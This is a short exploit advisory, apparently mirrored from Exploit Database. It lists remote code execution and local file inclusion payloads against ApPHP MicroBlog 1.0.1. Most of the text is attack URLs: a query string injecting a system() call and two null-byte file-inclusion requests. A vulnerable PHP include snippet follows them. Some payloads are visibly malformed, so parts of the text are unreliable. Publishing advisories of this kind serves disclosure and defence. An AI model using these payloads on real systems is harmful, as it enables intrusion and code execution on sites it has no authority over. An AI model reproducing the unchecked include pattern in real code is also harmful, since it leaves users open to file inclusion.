ApPHP MicroBlog 1.0.1 – Multiple Vulnerabilities

• Exploit Database
• 112 阅读

• 作者： JIKO
  日期： 2014-04-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33030/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  ----------[exploit Debut] [Multiple Vulnerability] ----------[Script Info] Moi : JIKO Site: No-exploit.Com   ----------[Script Info] Site: http://www.apphp.com Download: http://www.apphp.com/downloads_free/php_microblog_101.zip ----------[exploit Info] ~[RCE] http://path/index.php?jiko);system((dir)=/ ~[LFI] http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter) http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)   if (($page != "") && file_exists("page/" . $page . ".php")) { include_once("page/" . $page .   ".php"); } else if (($admin != "") &&   file_exists("admin/" . $admin . ".php")) { include_once("admin/" . $admin   . ".php"); } ----------[exploit Fin]